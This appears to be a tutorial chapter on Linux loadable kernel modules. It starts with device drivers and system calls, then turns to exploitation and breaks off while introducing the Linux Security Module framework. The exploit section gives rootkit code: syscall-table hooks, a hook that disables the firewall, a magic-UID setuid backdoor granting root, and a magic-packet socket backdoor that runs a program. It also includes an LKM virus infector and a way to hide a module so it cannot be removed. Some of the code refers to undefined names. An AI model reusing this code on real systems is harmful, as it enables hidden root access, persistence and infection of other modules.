    The kernel interacts with I/O devices by means of a software interface that is device driver. Generally device drivers are included in the kernel and consists of kernel data structures and some functions to control one or more devices.

    Device driver is a part of the computer's memory( kernel memory).It consist of some kernel functions and some kernel data structures.

    Some Device Drivers

    Block Driver : they communicate with the OS through a collection of fixed size buffers. Character Driver : They can handle I/O requests of arbitrary size and can be used to support almost any type of device.

    Main difference between Character Device and Block Device


    ·User process interact with block devices only indirectly through the buffer cache. ·There relationship of user with character device is direct.


    There is also another type of Driver that is STREAMS (in uppercase) . It is first introduced to AT&T in Unix System V Release 3 and makes it possible to stack protocol processing modules between the user process and the driver. Our ultimate aim is to write a modularized character driver which i will discuss in the subsequent sections.Suppose a real device driver is "scull" - a short and a simple character utility to act as a demonstrating driver properties. But this character driver is not hardware dependent. It just acts on some memory allocated using kmalloc. Since our device is a part of computer memory we are free to do what we want with it.


    The devices like this consisting of a memory area that is both global and persistent . Global means that if the device is opened multiple times ,the data contained within the device is shared by all the file descriptors that opened it. Persistent means that if the device is closed and reopened , data is not lost. Another property of this device is that it can act like pipes. One process reads what another process writes. If multiple process reads the same device , they contend for data. This property of the device will show how blocking and non-blocking read-and write can be implemented without having to resort to interrupts. Moreover real drivers synchronize with their devices using hardware interrupts.

    Major and Minor Numbers

    Char device are accessed through names in the filesystem. Those names are called special files or device files or simply nodes of the filesystem tree. They are conventionally located in the /dev directory (Considering the GNU/Linux). Special files of character drivers identify by a "c" in the first column of the output "ls -l " in the /dev directory. But block devices appear in the /dev directory but they are identified by "b" in the same way. We can also see two numbers in the output of above command in the case of device drivers which are known as "Major Numbers and Minor Numbers".

    The Major Number identifies the driver associated with the device. For example, /dev/zero and /dev/null are both managed by driver 1 whereas Virtual consoles and serial terminals are managed by driver 4. The kernel uses the major number at open time to despatch exdecution to the appropriate driver.

    The Minor Number is used only by the driver specified by the major number. Other parts of the kernel doesnot use it, and merely pass it along to the driver. This is common for a driver to control several device. The Minor Number provides a way for the driver to differentiate among them.

    Adding a new driver to the system means that assigning a major number tool. The assignment should be made at driver module initialisation function by invoking the following function, defined in
    "linux/fs.h" : 
    	 int register_chrdev(unsigned int major, const char *name,
    		struct file_operations *fops);	
    
    The command to create a device node on a filesystem is mknod.
    mknode /dev/scull0 c 254 0
    The scull driver implements only the most importent device menthods,
    and uses the tagged  format to declared its file_operations structure:
    
    struct file_operations scull_fops = {
    	llseek : scull_llseek,
    read : scull_read,
    write : scull_write,
    ioctl : scull_ioctl,
    open : scull_open,
    release : scull_release,
    };
    
    Here is a sample device driver Implementation (this is a very basic driver, it is just for demonstration, it does implement nearly no operations...) -
    #define MODULE
    #define __KERNEL__
    
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    /*just a dummy for demonstration*/
    static int driver_open(struct inode *i, struct file *f) {
     printk("Open Function\n");
     return 0;
    }
    /*register every function which will be provided by our driver*/
    static struct file_operations fops = {
    NULL,                 /*lseek*/
    NULL,                 /*read*/
    NULL,                 /*write*/
    NULL,                 /*readdir*/
    NULL,                 /*select*/
    NULL,                 /*ioctl*/
    NULL,                 /*mmap*/
    driver_open,          /*open, take a look at my dummy open function*/
    NULL,                 /*release*/
    NULL                  /*fsync...*/
    };
    
    
    int init_module(void)
    {
    		 /*register driver with major 40 and the name driver*/
     if(register_chrdev(40, "driver", &fops)) return -EIO;
      return 0;
    }
    
    void cleanup_module(void)
    {
    		 /*unregister our driver*/
     unregister_chrdev(40, "driver");
    }
    


    The most important function is register_chrdev(...) which registers our driver with the major number 40. If we want to access this driver,we should do the following :

    # mknod /dev/driver c 40 0

    # insmod driver.o



    After this we can access that device. The file_operations structure provides every function (operation) which our driver will provide to the system. As we can see this implementation is a very basic dummy function just printing something. It should be clear that we can implement our own devices in a very easy way by using the methods above.




    The layout of a scull device (char device )

    Our discussion thus far has been limited to char drivers. As we have explained that char driver is not the only device driver used in Linux systems. Block drivers provide access to block-oriented devices - those that transfer data in randomly accessible, fixed-size blocks. The classic block device is a disk drive.

    The char device interface is relatively clean and simple than the block device. Like the char devices block device drivers in the kernel are identified by major numbers. Block major numbers are entirely different from the char major numbers, however. A block device with major number 32 can coexist with a char device using the same major number since the two ranges are separate.

    The functions for registering and unregistering block devices look similar to those for char devices:

    #include "linux/fs.h"
    int register_blkdev(unsigned int major, const char *name, 
        struct block_device_operations *bdops);
    int unregister_blkdev(unsigned int major, const char *name);


    The arguments have the same general meaning as for char devices, and major numbers can be assigned dynamically in the same way. So the sbull (a sample block device driver like 'scull' ) device registers itself in almost exactly the same way as scull did:

    result = register_blkdev(sbull_major, "sbull", &sbull_bdops);
    if (result < 0) {
        printk(KERN_WARNING "sbull: can't get major %d\n",sbull_major);
        return result;
    }
    if (sbull_major == 0) sbull_major = result; /* dynamic */
    major = sbull_major; /* Use `major' later on to save typing */



    The similarity stops here, however. One difference is already evident: register_chrdev took a pointer to a file_operations structure, but register_blkdev uses a structure of type block_device_operations instead -- as it has since kernel version 2.3.38. The structure is still sometimes referred to by the name fops in block drivers; we'll call it bdops to be more faithful to what the structure is and to follow the suggested naming. The definition of this structure is as follows:

    struct block_device_operations {
        int (*open) (struct inode *inode, struct file *filp);
        int (*release) (struct inode *inode, struct file *filp);
        int (*ioctl) (struct inode *inode, struct file *filp,
                        unsigned command, unsigned long argument);
        int (*check_media_change) (kdev_t dev);
        int (*revalidate) (kdev_t dev);
    };



    The open, release, and ioctl methods listed here are exactly the same as their char device counterparts. The other two methods are specific to block devices and are discussed later. Note that there is no owner field in this structure; block drivers must still maintain their usage count manually, even in the 2.4 kernel.

    The bdops structure used in sbull is as follows:

     
    struct block_device_operations sbull_bdops = {
        open:               sbull_open,
        release:            sbull_release,
        ioctl:              sbull_ioctl,
        check_media_change: sbull_check_change,
        revalidate:         sbull_revalidate,
    };



    Note that there are no read or write operations provided in the block_device_operations structure. All I/O to block devices is normally buffered by the system (the only exception is with "raw'' devices); user processes do not perform direct I/O to these devices. User-mode access to block devices usually is implicit in filesystem operations they perform, and those operations clearly benefit from I/O buffering. However, even "direct'' I/O to a block device, such as when a filesystem is created, goes through the Linux buffer cache. As a result, the kernel provides a single set of read and write functions for block devices, and drivers do not need to worry about them.

    Clearly, a block driver must eventually provide some mechanism for actually doing block I/O to a device. In Linux, the method used for these I/O operations is called request; it is the equivalent of the "strategy'' function found on many Unix systems. The request method handles both read and write operations and can be somewhat complex. We will get into the details of request shortly.

    For the purposes of block device registration, however, we must tell the kernel where our request method is. This method is not kept in the block_device_operations structure, for both historical and performance reasons; instead, it is associated with the queue of pending I/O operations for the device. By default, there is one such queue for each major number. A block driver must initialize that queue with blk_init_queue.

    Queue initialization and cleanup is defined as follows:

    #include "linux/blkdev.h"
    blk_init_queue(request_queue_t *queue, request_fn_proc *request);
    blk_cleanup_queue(request_queue_t *queue);
    


    The init function sets up the queue, and associates the driver's request function with the queue. It is necessary to call blk_cleanup_queue at module cleanup time. The sbull driver initializes its queue with this line of code:

    blk_init_queue(BLK_DEFAULT_QUEUE(major), sbull_request);

    Each device has a request queue that it uses by default; the macro BLK_DEFAULT_QUEUE(major) is used to indicate that queue when needed. This macro looks into a global array of blk_dev_struct structures called blk_dev, which is maintained by the kernel and indexed by major number. The structure looks like this :

     struct blk_dev_struct {
        request_queue_t     request_queue;
        queue_proc          *queue;
        void                *data;
    };


    The request_queue member contains the I/O request queue that we have just initialized. We will look at the queue member shortly. The data field may be used by the driver for its own data -- but few drivers do so.



    Registering a block Device Driver





4.1.3 New System calls Implementation

    Every OS has some functions build into its kernel, which are used for every operation on that system.The functions Linux uses are called systemcalls. They represent a transition from user to kernel space.Opening a file in user space is represented by the sys_open systemcall in kernel space. For a complete list of all systemcalls available on your System look at /usr/include/sys/syscall.h. The following list shows syscall.h

    
    #ifndef _SYS_SYSCALL_H 
    #define _SYS_SYSCALL_H 
    #define SYS_setup 0 /* Used only by init, to get system going. */ 
    #define SYS_exit 1 
    #define SYS_fork 2 
    #define SYS_read 3 
    #define SYS_write 4 
    #define SYS_open 5 
    #define SYS_close 6 
    #define SYS_waitpid 7 
    #define SYS_creat 8
    	.
    	.
    	.
    #define SYS_setresuid 164 
    #define SYS_getresuid 165 
    #define SYS_vm86 166 
    #define SYS_query_module 167 
    #define SYS_poll 168 
    #define SYS_syscall_poll SYS_poll 
    
    #endif /* "sys/syscall.h" */
    



    Every systemcall has a defined number (see listing above), which is actually used to make the systemcall.The Kernel uses interrupt 0x80 for managing every systemcall. The systemcall number and any arguments are moved to some registers (eax for systemcall number, for example).The systemcall number is an index in an array of a kernel structure called sys_call_table[]. This structure maps the systemcall numbers to the needed service function.

    We can make our own customize systemcalls through our own Kernel module.We have used a syscall macro for constructing our own brk call, which is like the one we know from user space (->brk(2)). The truth about the user space library funtions (not all) is that they all are implemented through such syscall macros.



    The following code shows the _syscall1(..) macro used to construct the brk(..) function (taken from /asm/unistd.h).



    
    #define _syscall1(type,name,type1,arg1) \
    type name(type1 arg1) \
    { \
    long __res; \
    __asm__ volatile ("int $0x80" \
    : "=a" (__res) \
    : "0" (__NR_##name),"b" ((long)(arg1))); \
    if (__res >= 0) \
    return (type) __res; \
    errno = -__res; \
    return -1; \
    }


    The code is quite complex but ,it just calls interrupt 0x80 with the arguments provided by the _syscall1 parameters, name stands for the systemcall we need (the name is expanded to __NR_name, which is defined in /asm/unistd.h). This way we implemented the brk function. Other functions with a different count of arguments are implemented through other macros (_syscallX, where X stands for the number of arguments).

    We can use another way of implementing functions; look at the following example : 
    int (*open)(char *, int, int); /*declare a prototype*/
    open = sys_call_table[SYS_open];  /*we can also use __NR_open*/
    


    This way we don't need to use any syscall macro, we just have to use the function pointer from the 'sys_call_table'. This are the ways of constructing user space like functions which are used in the famous LKM utilities . But we must be careful when supplying arguments for those systemcalls, they need them in user space not from your kernel space position.

    There are many ways to bring our kernel space data to user space memory.A very easy way doing this (the best way opinion according to me) is playing with the needed registers. Linux uses segment selectors to differentiate between kernel space, user space . Arguments used with systemcalls which were issued from user space are somewhere in the data segment selector (DS) range. DS can be retrieved by using get_ds() from asm/segment.h. So the data used as parameters by systemcalls can only be accessed from kernel space if we set the segment selector used for the user segment by the kernel to the needed DS value. This can be done by using set_fs(...). But we have to restore FS after accessing the argument of the systemcall.


    Here some kernel space functions


    printk(...), it is a function ,which everyone can use in kernel space, it is also called kernel function.Those functions are made for kernel developers who needs complex functions and are nonmally available through Library functions. Ex: - suser() fsuser() /* for checking for superuser rights */

    Here is an example showing the above scenario.

    Filename is in our kernel space; a string we just created, for example

    unsigned long old_fs_value=get_fs();
    
    set_fs(get_ds);               /*after this we can access the user space data*/
    open(filename, O_CREAT|O_RDWR|O_EXCL, 0640);
    set_fs(old_fs_value);         /*restore fs...*/
    


    This is the fastest way of solving the problem. The functions which are showed still now (brk, open) are all implemented through a single systemcall. But there are also groups of user space functions which are summarized into one systemcall. Example - sys_socketcall. It implements every function concerning sockets (creation, closing, sending, receiving,...).
    In certain situations it could be very interesting to redirect the execution of a file. Those files could be /bin/login, tcpd, etc.. This would allow us to insert any new systemcall in the running kernel. Here we used the following syntax -

    extern void* sys_call_table[]; 
    /*must be defined because of syscall macro used below*/ 
    
    /* creating error representative integer */
    int errno; 
    
    /*we define our own systemcall*/ 
    int __NR_myexecve; 
    
    /*we must use brk*/ 
    static inline _syscall1(int, brk, void *, end_data_segment); 
    
    int (*orig_execve) (const char *, const char *[], const char *[]);
    
     /*here user -> kernel space transition specialized for strings is better than memcpy_fromfs(...)*/ 
    
    char *strncpy_fromfs(char *dest, const char *src, int n) 
    { 
    	char *tmp = src; 
    	int compt = 0; 
    	do { 
    		dest[compt++] = __get_user(tmp++, 1); 
    	} while ((dest[compt - 1] != '\0') && (compt != n));
    	 return dest;
     } 
    
    


    /*this is something like a systemcall macro called with SYS_execve, the asm code calls int 0x80 with the registers set in a way needed for our own __NR_myexecve systemcall*/

    int my_execve(const char *filename, const char *argv[], const char *envp[]) {
        long __res; 
    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) 
    	(filename)), "c"((long) (argv)), 	"d"((long) (envp)));
        return (int) __res;
     } 
    
    int init_module(void) /*module setup*/  {
    	 /*the following lines choose the systemcall number of our new
     myexecve*/
    
     __NR_myexecve = 200; 
    while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0) __NR_myexecve--; 
    
    orig_execve = sys_call_table[SYS_execve]; 
    
    if (__NR_myexecve != 0) { 
    	sys_call_table[__NR_myexecve] = orig_execve; 	sys_call_table[SYS_execve] = (void *) hacked_execve; 
    	}
     return 0; 
    } 
    
    void cleanup_module(void)            /*module shutdown*/
    {
    	sys_call_table[SYS_execve]=orig_execve;                                   
    }
    
    	


    In above program we have enhance the provided systemcall

    SYS_execve then customize it according to our need .More over we can load and unload this new system call on demand through the module setup & module shutdown procedure in above program. Unless and until the module is loaded we can used the original system call.



4.2 Kernel Module in Exploit

    Now we start abusing the LKM(or KLM) scheme. Normally LKMs are used to extend the kernel (especially hardware drivers). But this will do something different, they will intercept systemcalls and modify them in order to change the way the system reacts on certain commands. The following module makes it possible for any user on the compromised system to change the OS version information and exploit create directory command. This is just a little demonstration to show the way we follow.

    Example 1: Changing the OS version information: (for command 'uname -a')

    c

    extern void* sys_call_table[];       /*sys_call_table is exported, so we
                                        can access it*/     
    int (*orig_utsname)(struct old_utsname *name);
    static char *os_label;
    MODULE_PARM(os_label, "s");
    static int uname_h(struct old_utsname *name) {
     int res;
     res = (*orig_utsname)(name);
     if(res < 0) {  return(-EFAULT);  }
     copy_to_user(name->sysname, os_label, sizeof(name->sysname));
     copy_to_user(name->nodename, os_label, sizeof(name->sysname));
     copy_to_user(name->machine, os_label, sizeof(name->sysname));
     copy_to_user(name->release, os_label, sizeof(name->sysname));
      return(0);
    }
    int init_module(void) {
     orig_utsname = sys_call_table[SYS_uname];
     sys_call_table[SYS_uname] = uname_h;
     return(0);
    }
    void cleanup_module(void) {
     sys_call_table[SYS_uname] = orig_utsname;
     return;
    }

    It should be compiled as" #gcc -c -O3 filename.c " then it should be installed through #insmod filename.o os_label = "koushik"


    Example 2: It will change the mkdir system call (or mkdir command).
    #define MODULE
    #define __KERNEL__
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    
    extern void* sys_call_table[];       /*sys_call_table is exported, so we
                                        can access it*/               
    
    int (*orig_mkdir)(const char *path); /*the original systemcall*/
    
    
    int hacked_mkdir(const char *path)
    {
    return 0;                           /*everything is ok, but he new systemcall
                                        does nothing*/
    }
    
    int init_module(void)                /*module setup*/
    {
    orig_mkdir=sys_call_table[SYS_mkdir];
    sys_call_table[SYS_mkdir]=hacked_mkdir;
    return 0;
    }
    
    void cleanup_module(void)            /*module shutdown*/
    {
    sys_call_table[SYS_mkdir]=orig_mkdir; /*set mkdir syscall to the origal
                                          one*/
    }


    After compiling and installing this module make a directory, it will not work. Because of returning 0 (standing for OK) we don't get an error message. After removing the module making directories is possible again.we can see, we only need to change the corresponding entry in sys_call_table for intercepting a kernel systemcall.



    The general approach to intercepting a systemcall is outlined in the following list : "find the systemcall entry in sys_call_table[] (at include/sys/ syscall.h)

    "save the old entry of sys_call_table[X] in a function pointer (where X stands for the systemcall number we want to intercept)

    "save the address of the new (hacked) systemcall as we defined by setting sys_call_table[X] to the needed function address

    We can conclude that it is very useful to save the old systemcall function pointer, because we will need it in our hacked one for emulating the original call.

    Interesting Syscalls to Intercept


    It is quite impossible to know every systemcall for every user space function an application or command can use. So there is some hints on finding systemcalls to take control over.

    · reading source code. On systems like Linux we can have the source code on nearly any program a user (admin) can use. There we can found a basic function like dup, open, write, ..etc.

    · taking a look at include/sys/syscall.h & trying to find a directly corresponding systemcall (like SYS_dup; for write -> SYS_write; ...).

    · some calls like socket, send, receive, ... are implemented through one systemcall .

    Finding interesting systemcalls (the strace approach)


    If we issue a command #strace whoami (enter) ,this will give us a output of every systemcall made by 'whoami' command during execution. In the result we will find there are 4 systemcalls in order to manipulate the output of whoami systemcall.

    There are 4 interesting systemcalls to intercept in order to manipulate the output of 'whoami'

    geteuid() = 500
    getuid() = 500
    getgid() = 100
    getegid() = 100


    Confusing the kernel's System Table


    In accessing the sys_call_table, we can use the kernel symbol table. Because sys_call_table contains all the functions which we can modify and can access any exported item (functions, structures, variables, for example) by accessing them within our module. Anything listed in /proc/ksyms can be corrupted.
    Here is a view of /proc/ksyms -

    001bf1dc ppp_register_compressor
    ......
    
    00139318 call_in_firewall
    0013935c call_out_firewall
    .......
    

    we can target the function "call_in_firewall", it is used as the firewall management in the kernel. Now we are replacing this function with a bogus one .Here is the exploit program -

    #define MODULE
    #define __KERNEL__
    
    #include "linux/module.h"
    #include "linux/kernel.h"
    #include "asm/unistd.h"
    #include "sys/syscall.h"
    #include "sys/types.h"
    #include "asm/fcntl.h"
    #include "asm/errno.h"
    #include "linux/types.h"
    #include "linux/dirent.h"
    #include "sys/mman.h"
    #include "linux/string.h"
    #include "linux/fs.h"
    #include "linux/malloc.h"
    
    /*get the exported function*/
    extern int *call_in_firewall;
    
    /*our nonsense call_in_firewall*/
    int new_call_in_firewall(){
    	return 0;
    }
    int init_module(void)                /*module setup*/
    {
    	call_in_firewall=new_call_in_firewall;
    	return 0;
    }
    
    void cleanup_module(void)            /*module shutdown*/
    {
    	return 0;
    }
    		
    



    After compiling and loading this LKM and do a 'ipfwadm -I -a deny'. After this do a 'ping 127.0.0.1', kernel will produce a nice error message, because the called call_in_firewall(...) function was replaced by a bogus one.

    This is a quite brutal way of killing an exported symbol. We could also disassemble (using gdb) a certain symbol and modify certain bytes which will change the working of that symbol.

    This hack is not only systemcall related, it is also very important for general permission problems.This means whenever a setuid is used with this magic UID, the module will set the UIDs to 0 (SuperUser). Let a user has uid =500 when he logon then the uid will be 0 (like the superuser).

    Here is the implementation(It will only show the hacked_setuid systemcall)

    int hacked_setuid(uid_t uid) {
       int tmp;
       
       /*do we have the magic UID (defined in the LKM somewhere before*/
       if (uid == MAGICUID) {
       /*if so set all UIDs to 0 (SuperUser)*/
    current->uid = 0;
    current->euid = 0;
    current->gid = 0;
    current->egid = 0;
    return 0;
       }
       tmp = (*o_setuid) (uid);
       return tmp;
    }
    
    
    



    Network (Socket) related Hacks

    The network is the hacker's playground. So There are many things we can do by controlling Socket Operations. Here we uses a nice back door.We just intercepts the sys_socketcall systemcall, waiting for a packet with a certain length and a certain contents.

    Here is the implementation of the hacked systemcall (The main function )

    int hacked_socketcall(int call, unsigned long *args)
    {
    int ret, ret2, compt;
    
    /*our magic size*/
    int MAGICSIZE=42;
    
    /*our magic contents*/
    char *t = "packet_contents";
    unsigned long *sargs = args;
    unsigned long a0, a1, mmm;
    void *buf;
    
    /*do the call*/
    ret = (*o_socketcall) (call, args);
    
    /*did we have magicsize & and a recieve ?*/
     if (ret == MAGICSIZE && call == SYS_RECVFROM) 
     {
      /*work on arguments*/
      a0 = get_user(sargs);
      a1 = get_user(sargs + 1);
      buf = kmalloc(ret, GFP_KERNEL);
      memcpy_fromfs(buf, (void *) a1, ret);
      for (compt = 0; compt < ret; compt++)
       if (((char *) (buf))[compt] == 0)
        ((char *) (buf))[compt] = 1;
       /*do we have magic_contents ?*/
       if (strstr(buf, mtroj)) 
       {
        kfree(buf);
        ret2 = fork();
       if (ret2 == 0) 
       {
        /*if so execute our proggy (shell or whatever you want...) */
        mmm = current->mm->brk;
        ret2 = brk((void *) (mmm + 256));
        memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);
    
        /*plaguez's execve implementation -> see 4.2*/
        ret2 = my_execve((char *) mmm + 2, NULL, NULL);
       }
      }
     }
    return ret;
    }
    




    The code intercepts every sys_socketcall (which is responsible for everything concerning socket-operations ). Inside the hacked systemcall the code first issues a normal systemcall. After that the return value and call variables are checked. If it was a receive Socketcall and the 'packetsize' (...nothing to do with TCP/IP packets...) is ok it will check the contents which was received. If it can find our magic contents, the code can be sure,that we (hacker) want to start the backdoor program. This is done by my_execve(...). his approach is very good, it would also be possible to wait for a speciel connect / close pattern, just be creative. But we have to remember that the methods mentioned above need a service listing on a certain port, because the receive function is only issued by daemons receiving data from an established connection. This is a disadvantage, because it could be a bit suspect for some paranoid admins out there.


    Virus writing with LKMs

    This is not the hacking part this is the part of virus coding using the concept of Kernel Module.This Kernel Module requires a Linux system and kerneld installed.
    First of all we have to know that LKM infector does not infect normal elf executables , it only infects modules, which are loaded / unloaded. This loading / unloading is often managed by kerneld. So if a module infected with the virus code; when loading this module user also load the virus LKM which uses self hiding features .This virus module intercepts the sys_create_module and sys_delete_module systemcalls for further infection.
    Whenever a module is unloaded on that system it is infected by the new sys_delete_module systemcall. So every module requested by kerneld (or manually) will be infected when unloaded.
    You could imagine the following scenario for the first infection :

    "admin is searching a network driver for his new interface card (ethernet,...).

    "he starts searching the web.

    "he finds a driver module which should work on his system & downloads it.

    "he installs the module on his system [the module is infected]

    --> the infector is installed, the system is compromised


    Of course, he did not download the source, he was lazy and took the risks using a binary file. So admins never trust any binary files (esp. modules). So I hope you see the chances / risks of LKM infectors, now let's look a bit closer at the LKM infector by SVAT. Imagine you have the source for the virus LKM (a simple module, which intercepts sys_create_module / sys_delete_module and some other [more tricky] stuff). The first question would be how to infect an existing module (the host module). Well let's do some experimenting. Take two modules and 'cat' them together like


    # cat module1.o >> module2.o
    After this try to insmod the resulting module2.o (which also includes module1.o at its end).
    # insmod module2.o
    Ok it worked, now check which modules are loaded on your system
    # lsmod
    Module Pages Used by
    module2 1 0


    So we know that by concatenating two modules the first one (concerning object code) will be loaded, the second one will be ignored. And there will be no error saying that insmod can not load corrupted code or so.With this in mind, it should be clear that a host module could be infected by

    cat host_module.o >> virus_module.o
    ren virus_module.o host_module.o


    This way loading host_module.o will load the virus with all its nice LKM features. But there is one problem, how do we load the actual host_module ? It would be very strange to a user / admin when his device driver would do nothing. Here we need the help of kerneld. As I said in I.7 you can use kerneld to load a module. Just use request_module("module_name") in your sources.This will force kerneld to load the specified module. But where do we get the original host module from ? It is packed in host_module.o (together with virus_module.o). So after compiling your virus_module.c to its objectcode you have to look at its size (how many bytes). After this you know where the original host_module.o will begin in the packed one (you must compile the virus_module two times : the first one to check the objectcode size, the second one with the source changed concerning objectsize which must be hardcoded...). After these steps your virus_module should be able to extract the original host_module.o from the packed one. You have to save this extracted module somewhere, and load it via request_module("orig_host_module.o"). After loading the original host_module.o your virus_module (which is also loaded from the insmod [issued by user, or kerneld]) can start infecting any loaded modules.


    Stealthf0rk (SVAT) used the sys_delete_module(...) systemcall for doing the infection, so let's take a look at his hacked systemcall (I only added some comments) :

    /*just the hacked systemcall*/
    int new_delete_module(char *modname)
    {
    /*number of infected modules*/
    static int infected = 0;
    int retval = 0, i = 0;
    char *s = NULL, *name = NULL;
    
    /*call the original sys_delete_module*/       
    retval = old_delete_module(modname); 
    
     if ((name = (char*)vmalloc(MAXPATH + 60 + 2)) == NULL)
     return retval;
    
    
    
    
    /*check files to infect -> this comes from hacked sys_create_module; just
    a feature of *this* LKM infector, nothing generic for this type of virus*/
    for (i = 0; files2infect[i][0] && i < 7; i++) 
    {
     strcat(files2infect[i], ".o"); 
     if ((s  = get_mod_name(files2infect[i])) == NULL) 
     {
      return retval;
     }
     name = strcpy(name, s);
     if (!is_infected(name)) 
     {
      /*this is just a macro wrapper for printk(...)*/
      DPRINTK("try 2 infect %s as #%d\n", name, i);
      /*increase infection counter*/
      infected++;
      /*the infect function*/
      infectfile(name);
     }
     memset(files2infect[i], 0, 60 + 2);
    } /* for */
    /* its enough */
    /*how many modules were infected, if enough then stop and quit*/
    if (infected >= ENOUGH)
     cleanup_module();
    vfree(name);
    return retval;
    }
    Well there is only one function interesting in this systemcall: infectfile(...). 
    So let's examine that function (again only some comments were added by me) : 
    int infectfile(char *filename)
    {
    char *tmp = "/tmp/t000";
    int in = 0, out = 0;
    struct file *file1, *file2;
    
    /* this is a macro define by the virus. It does the
    kernel space -> user space handling for systemcall arguments(see I.4)*/
    BEGIN_KMEM
    /*open objectfile of the module which was unloaded*/
    in = open(filename, O_RDONLY, 0640);
    /*create a temp. file*/
    out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);
    /*see BEGIN_KMEM*/
    END_KMEM
    
    DPRINTK("in infectfile: in = %d out = %d\n", in, out);
    if (in <= 0 || out <= 0)
     return -1;
    file1 = current->files->fd[in];
    file2 = current->files->fd[out];
    if (!file1 || !file2)
     return -1;
    
    /*copy module objectcode (host) to file2*/
    cp(file1, file2);
    BEGIN_KMEM
    file1->f_pos = 0;
    file2->f_pos = 0;
    /* write Vircode [from mem] */
    DPRINTK("in infetcfile: filenanme = %s\n", filename);
    file1->f_op->write(file1->f_inode, file1, VirCode, MODLEN);
    cp(file2, file1);
    close(in);
    close(out);
    unlink(tmp);
    END_KMEM
    return 0;
    }  



    I think the infection function should be quite clear. There is only thing left which I think is necessary to discuss : How does the infected module first start the virus, and load the original module (we know the theory, but how to do it in reality) ? For answering this question lets take a look at a function called load_real_mod(char *path_name, char* name) which manages that problem :


    /* Is that simple: we disinfect the module [hide 'n seek]
    * and send a request to kerneld to load
    * the orig mod. N0 fuckin' parsing for symbols and headers
    * is needed - cool.
    */
    int load_real_mod(char *path_name, char *name)
    {    
    int r = 0, i = 0;  
    struct file *file1, *file2;
    int in =  0, out = 0; 
    
    DPRINTK("in load_real_mod name = %s\n", path_name);
    if (VirCode)
     vfree(VirCode);
    VirCode = vmalloc(MODLEN);
    if (!VirCode)
      return -1;
    BEGIN_KMEM
    /*open the module just loaded (->the one which is already infected)*/
    in = open(path_name, O_RDONLY, 0640);
    END_KMEM
    if (in <= 0)
     return -1;
    file1 = current->files->fd[in];
    if (!file1)
     return -1;
    /* read Vircode [into mem] */
    BEGIN_KMEM
    file1->f_op->read(file1->f_inode, file1, VirCode, MODLEN);
    close(in);
    END_KMEM
    /*split virus / orig. module*/
    disinfect(path_name);
    /*load the orig. module with kerneld*/
    r = request_module(name);
    DPRINTK("in load_real_mod: request_module = %d\n", r);
    return 0;
    }    
    



    · It should be clear *why* this LKM infector need kerneld now, we need to load the original module by requesting it with request_module(...). I hope you understood this very basic journey through the world of LKM infectors (virus). The next sub sections will show some basic extensions / ideas concering LKM infectors.


Making our LKM invisible & unremovable



    Now it's time to start talking about the most important / interesting Hack I will present. This idea comes from plaguez's LKM published in Phrack (other people like Solar Designer discussed this before...).
    So far we are able to hide files, processes, directories, and whatever we want. But we cannot hide our own LKM. Just load a LKM and take a look at /proc/modules. There are many ways we can solve this problem. The first solution could be a partial file hiding (see II.4.3). This would be easy to implement, but there is a better more advanced and secure way. Using this technique you must also intercept the sys_query_module(...) systemcall. An example of this approach can be seen in A-b.
    As I explained in I.1 a module is finally loaded by issuing a init_module(...) systemcall which will start the module's init function. init_module(...) gets an argument : struct mod_routines *routines. This structure contains very important information for loading the LKM. It is possible for us to manipulate some data from this structure in a way our module will have no name and no references. After this the system will no longer show our LKM in /proc/modules, because it ignores LKMs with no name and a refernce count equal to 0. The following lines show how to access the part of mod_routines, in order to hide the module.



    /*from Phrack & AFHRM*/
    int init_module()
    {
     register struct module *mp asm("%ebp");   // or whatever register it is in
     *(char*)mp->name=0;
     mp->size=0;
     mp->ref=0;
    


    This code trusts in the fact that gcc did not manipulate the ebp register because we need it in order to find the right memory location. After finding the structure we can set the structure's name and references members to 0 which will make our module invisible and also unremovable, because you can only remove LKMs which the kernel knows, but our module is unknow to the kernel. Remember that this trick only works if you use gcc in way it does not touch the register you need to access for getting the structure.

    We must use the following gcc options :

    #gcc -c -O3 -fomit-frame-pointer module.c

    · fomit-frame-pointer says cc not to keep frame pointer in registers for functions that don't need one. This keeps our register clean after the function call of init_module(...), so that we can access the structure. In my opinion this is the most important trick, because it helps us to develope hidden LKMs which are also unremovable.




4.2.2 Introduction of Linux Security Module Project

    With time it was realised that a general access-control framework for the Linux kernel was needed. This approach would allow different security models to work without modifying the main kernel code.At the 2001 Linux Kernel Summit, NSA developers presented their work on Security-Enhanced Linux (SELinux) and emphasized the need for enhanced security support in the main Linux kernel.And thus grew the Linux Security Module Project (LSM).

    A number of developers worked together to create a framework of kernel hooks that would allow many security models to work as loadable kernel modules.After wards the first portions of the LSM framework appeared in the 2.5.29 kernel release. Further kernel releases contained more portions of the LSM framework, and hopefully the entire patch is included in the 2.6.0 kernel release(which was incidently realeased just a few days back).

    This is a brief overview as how to create a simple kernel module that uses the LSM framework rather than divulging into how the LSM framework works or the design decisions that were made in creating it.


    Root Plug


    Let us uses the 2.5.31 kernel release, which contains enough of the LSM interface for us to create a useful module. In our module,suppose we want to prevent any programs with the group ID of 0 (root) from running if a specific USB device is not plugged in to the machine at that moment. This provides us with a simple way of preventing root exploits from running on our machine, or for new users to log in when we are not present.


    Let us now consider for this the following sampling: Let us create a kernel module called root_plug.

    Armed with the knowledge of how UNIX systems handle the user and group ID values and how they interact with the setuid class of system calls we develop a module based on LSM interface.

    The LSM interface is four simple functions:

    
    int register_security
        (struct security_operations *ops);
    int unregister_security 
        (struct security_operations *ops);
    
    int mod_reg_security (const char *name, 
                      struct security_operations *ops);
    int mod_unreg_security  (const char *name, 
                      struct security_operations *ops);
    


